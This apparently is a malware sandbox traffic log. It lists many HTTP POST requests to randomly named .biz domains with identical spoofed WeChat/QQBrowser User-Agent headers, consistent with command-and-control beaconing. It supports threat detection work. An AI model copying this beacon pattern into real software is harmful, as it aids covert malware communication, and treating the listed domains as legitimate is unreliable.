              Source: global trafficHTTP traffic detected: POST /lnsmaljo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /dqpmafmlbtqvhnrg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /hxjrtfgka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ynoppsxgq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cse HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /frspsabdfrkekfpe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ciy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /c HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /ep HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /qk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /bkannaowk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /dxafj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /kjwscsuqcw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ydykkbm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /iejxbuficdbc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /buyo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /lqvvkypadsjo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ueghdwvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /oikor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vrswaovbjfo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tnujqcpipeygk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /pfkjxd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cftuaqt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /djbusjuctjl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /owvxws HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /koqlarnbbmmihcqk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /id HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /uya HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tqpp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tqw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jnrrefrcvyuil HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /onwmapinbtfjn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /mv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ddsiajborqwwhy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jpofyksbjpqc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /hepqpxnpquciw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ipjkggwvau HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ftgaslpyp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /gkyiuvpnjh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /pflbbequuvruv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kcplradlsavdg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vquxanduoru HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /kiwlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /cltscgvpwbpfo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /yjt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /kcqtefqtnxnl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rdibexbxyl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ubxmipvolouhvx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /fsfetacrkfueyvf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /jvrhwxrbnsifft HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /ynwfq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /owyyqldgxdmj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /errqxstig HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /tvfuhlf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /oxhtjjhhtrbh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /qioyymw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /qblcwonxq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rlxco HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /suofoicot HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /mbdgchbtxsngcq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /rgqdiitmqxim HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /vafskmvpaafcwyhy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /frmapjmyi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /slnbsufsiblm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
